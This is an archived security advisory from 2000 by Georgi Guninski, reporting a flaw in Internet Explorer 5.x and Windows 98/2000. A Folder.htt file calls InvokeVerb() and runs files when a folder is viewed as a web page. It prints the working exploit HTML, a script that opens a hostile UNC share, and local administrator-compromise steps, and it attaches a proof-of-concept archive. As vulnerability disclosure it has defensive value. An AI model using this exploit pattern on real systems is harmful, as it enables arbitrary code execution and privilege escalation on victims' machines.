ie5-msn.exec.txt

2000-08-16T00:00:00
ID PACKETSTORM:22841
Type packetstorm
Reporter Georgi Guninski
Modified 2000-08-16T00:00:00

Description

                                        
                                            `This is a multi-part message in MIME format.  
--------------CEF2E6A38C7BDB5B012ADFB8  
Content-Type: text/plain; charset=koi8-r  
Content-Transfer-Encoding: 7bit  
  
Georgi Guninski security advisory #18, 2000  
  
IE 5.5/5.x for Win98 may execute arbitrary files that can be accessed  
thru Microsoft Networking. Also local Administrator compromise at least  
on default Windows 2000.  
  
Systems affected:  
For remote file execution: IE 5.5,5.x/Windows 98, the files must be  
accessible thru Microsoft Networking.  
For local Administrator compromise on Windows 2000: default Windows 2000  
installation, I have not tested with IE 5.5 installed, but believe to  
work  
  
Risk: HIGH  
Date: 14 August 2000  
  
Description:  
This advisory contains two issues, but since they use common ActiveX  
control and concept, I decided to post them in one advisory.  
I) IE 5.x may execute arbitrary programs when visiting a web page,  
reading HTML based mail with Outlook or simply browsing folders (that  
may be remote) as web pages (which is the default configuration for  
Windows).  
II) Local Administrator compromise on default installation of Windows  
2000. Have not tested with IE 5.5 installed, but believe to work. In  
order to be compromised, the Administrator must open a local folder as a  
web page (which is the default option when browsing folders).  
In both cases a malicous person may take full control over user's  
computer/server.  
  
  
Disclaimer:  
The opinions expressed in this advisory and program are my own and not  
of any company.  
The usual standard disclaimer applies, especially the fact that Georgi  
Guninski  
is not liable for any damages caused by direct or indirect use of the  
information or functionality provided by this program.  
Georgi Guninski, bears NO responsibility for content or misuse of this  
program or any derivatives thereof.  
  
Legal Notice:  
This Advisory is Copyright (c) 2000 Georgi Guninski. You may distribute  
it unmodified. You may not modify it and distribute it or distribute  
parts of it without the author's written permission.  
  
Details:  
  
General stuff:  
  
I know browsing web sites and reading HTML mail may be dangerous, but it  
turns out that browsing local or remote folders also is dangerous.  
The exploits use a feature of Windows 98/2000 that allows viewing  
folders as web pages due to the integration of IE in the operating  
system.  
This allows putting active content when browsing local/remote folder,  
which turns out to be dangerous.  
The way the folder looks when viewed as a web page is controlled by a  
file Folder.htt located in the folder, which is a special HTML file that  
may contain Active Scripting and ActiveX Objects.  
If you want to view the files in the folder, you must use an ActiveX  
Control - Shell DefView, which basically contains the functionality of  
the old Explorer.  
The Shell DefView Control has an interesting method - InvokeVerb, which  
is used to perform actions with the currently selected file - for  
example showing its properties and the most interesting part -  
opening/executed it.  
It has a string parameter - the action to perform on a file or folder.  
Microsoft has tried to secure it - it yields a security error if you  
pass an argument to it and that is reasonable.  
But amazingly, if you just do InvokeVerb() with no parameters - it  
executes the default action on the file/folder and the action is Open  
(Execute).  
So, to exploit this we create a folder and place a malicous file that we  
want to execute - for example "a.bat". Also in that folder, we put the  
active file Folder.htt.  
  
The code of Foder.htt:  
----------------------------------------  
<html>  
<body >  
<script>  
setTimeout("f()",2000);  
function f() {  
FileList.focus();  
FileList.FocusedItem.InvokeVerb();  
}  
</script>  
<H1>Hello World<BR>Written by Georgi Guninski</H1>  
<object id=FileList border=0 tabindex=1  
classid="clsid:1820FED0-473E-11D0-A96C-00C04FD705A2">  
</object>  
</body>  
</html>  
----------------------------------------  
  
So what the code does:  
FileList.focus() focuses the first file in our folder - in our example  
a.bat. Note: a.bat may be not the first file in our folder, this depends  
on the arrangement of the icons in the folder (default is by name). But  
to circumvent this we may put additional files with different  
names/dates/extensions so whatever the arrangement is, our target file  
is first in the list.  
FileList.FocusedItem.InvokeVerb() does the real job - it opens(executes)  
the focused file.  
So we create a customized folder with malicous content, place it  
somewhere probably remote and wait or force a victim to open it.  
  
Demonstration.  
  
ac.zip is available at: http://www.nat.bg/~joro/ac.zip  
  
For I) IE 5.x may execute arbitrary files when visiting a web page,  
reading HTML based mail with Outlook or simply browsing folders (that  
may be remote) as web pages (which is the default configuration for  
Windows).  
To test it remotely with Windows 98:  
Unzip ac.zip in a UNC share for example: \\HOSTILEUNCORIP\SHARE  
Browse \\HOSTILEUNCORIP\SHARE as a web page from IE.  
  
Or open a web page containing:  
-----  
<SCRIPT>  
window.open("\\\\HOSTILEUNCORIP\\SHARE");  
</SCRIPT>  
-----  
Note: Sometimes the remote test does not work the first time, I don't  
know why. Try again (browse the folder again or reload the web page) if  
it does not work the first time.  
  
For II) Local Administrator compromise on default installation of  
Windows 2000.  
Have not tested with IE 5.5 installed, but believe to work. In order to  
be compromised, the Administrator must open a local folder as a web page  
(which is the default option when browsing folders).  
A local user may create a customized folder and if the the Administrator  
open it as a web page (which is default) then the administrator account  
is compromised.  
It is amazing that when the Administrator opens the folder a security  
warning  
"...may be unsafe...Do you want to allow it to be initialized an  
accessed by scripts?" with "Yes/No" buttons.  
Whatever button you choose, the content is executed. I find this funny.  
I would appreciate if someone test this with IE 5.5 on Windows 2000 and  
let me know if it works.  
  
As an ordinary user, unzip ac.zip in any folder, for example ac.  
1) Open ac from My Computer  
2) Select View->Customize this Folder->Next->Customize->Choose or  
edit...->Next  
3) Select Choose a template->Current->Next->Finish  
  
Wait for the Administrator to open the folder as a web page.  
  
Workaround: Do not browse folders as web pages.  
  
I know the remote attack may be stopped by a firewall that blocks  
Microsoft Networking and I encourage configuring the firewall in such  
way.  
But I think that application holes must be fixed at application level  
and not rely on firewall behavior.  
  
Regards,  
Georgi Guninski  
http://www.nat.bg/~joro  
--------------CEF2E6A38C7BDB5B012ADFB8  
Content-Type: application/x-zip-compressed;  
name="ac.zip"  
Content-Transfer-Encoding: base64  
Content-Disposition: inline;  
filename="ac.zip"  
  
UEsDBBQAAAAIANBoDSlOT//c9wAAAE0BAAAKAAAARm9sZGVyLmh0dF2Qy07DMBBF95HyD6Os  
Eok0TigUaBKptE1biRVCdF07EzB1bGQ7iArx79jhsWBmMUfzuFea8tn2og6Dkqr2BB4M0/zV  
OjJoH3iParBx1MVJdFYQQpJ5GHSDZJYrCa4LH2EAPhou8I4bO+kUG0yczMcu/J82fortzmI/  
2ck3dcRH1DT2sp/OPPtz91lu83qLQijYKy3a8va+3mtuLUqgJ9ig0k8cNoPk0hx5mbltd6Po  
CzILvK1+TYEq3aKuCNgD5bLF9yoHJg7GuKWICVdu8quCNOsVSaez83Wa544W15fLlJAlmTar  
GblYFJGXz771R/Q/G+HniV9QSwMEFAAAAAgAsm1sKPzQ9MWRAAAACgEAAAsAAABkZXNrdG9w  
LmluaY2P0QrCIBhG7wUfxc3JEgt2sTaFLqIg6GZ0MeiXSaahRkH07o31At6f7/CdQb7TaQJr  
lbdXCGcDr3jBqAc9Pm1qPqu1qJWSlDDR16SqOkVayTmhglK2ZbJinH0xyuOydRgNeeh89Qgh  
mpj23pkbhEYbC5uy/OcUU0qLrVgaOzvGuHPaz7POO23CXc344dFQjH5QSwMECgAAAAAANWUN  
KTbDir4oAAAAKAAAAAUAAABhLmJhdGVjaG8gIldyaXR0ZW4gYnkgR2VvcmdpIEd1bmluc2tp  
Ig0KUGF1c2VQSwECMgsUAAAACADQaA0pTk//3PcAAABNAQAACgAAAAAAAAABACIAtoEAAAAA  
Rm9sZGVyLmh0dFBLAQIyCxQAAAAIALJtbCj80PTFkQAAAAoBAAALAAAAAAAAAAEAIgC2gR8B  
AABkZXNrdG9wLmluaVBLAQIyCwoAAAAAADVlDSk2w4q+KAAAACgAAAAFAAAAAAAAAAEAIAD/  
gdkBAABhLmJhdFBLBQYAAAAAAwADAKQAAAAkAgAAAAA=  
--------------CEF2E6A38C7BDB5B012ADFB8--  
  
begin 600 ac.zip  
M4$L#!!0````(`-!H#2E.3__<]P```$T!```*````1F]L9&5R+FAT=%V0RT[#  
M,!!%]Y'R#Z.L$HDT3B@4:!*IM$U;B15"=%T[$S!U;&0[B`KQ[]CAL6!F,4?S  
MN%>:\MGVH@Z#DJKV!!X,T_S5.C)H'WB/:K!QU,5)=%800I)Y&'2#9)8K":X+  
M'V$`/AHN\(X;.^D4&TR<S,<N_)\V?HKMSF(_V<DW=<1'U#3VLI_.//MS]UEN  
M\WJ+0BC8*RW:\O:^WFMN+4J@)]B@TD\<-H/DTAQYF;EM=Z/H"S(+O*U^38$J  
MW:*N"-@#Y;+%]RH')@[&N*6("5=N\JN"-.L52:>S\W6:YXX6UY?+E)`EF3:K  
M&;E8%)&7S[[U1_0_&^'GB5]02P,$%`````@`LFUL*/S0],61````"@$```L`  
M``!D97-K=&]P+FEN:8V/T0K"(!A&[P4?Q<W)$@MVL3:%+J(@Z&9T,>B72::A  
M1D'T[HWU`MZ?[_"=0;[3:0)KE;=7"&<#KWC!J`<]/FUJ/JNUJ)62E##1UZ2J  
M.D5:R3FA@E*V9;)BG'TQRN.R=1@->>A\]0@AFICVWID;A$8;"YNR_.<44TJ+  
MK5@:.SO&N'/:S[/..VW"7<WXX=%0C'Y02P,$"@``````-64-*3;#BKXH````  
M*`````4```!A+F)A=&5C:&\@(E=R:71T96X@8GD@1V5O<F=I($=U;FEN<VMI  
M(@T*4&%U<V502P$",@L4````"`#0:`TI3D__W/<```!-`0``"@`````````!  
M`"(`MH$`````1F]L9&5R+FAT=%!+`0(R"Q0````(`+)M;"C\T/3%D0````H!  
M```+``````````$`(@"V@1\!``!D97-K=&]P+FEN:5!+`0(R"PH``````#5E  
M#2DVPXJ^*````"@````%``````````$`(`#_@=D!``!A+F)A=%!+!08`````  
.`P`#`*0````D`@``````  
`  
end  
`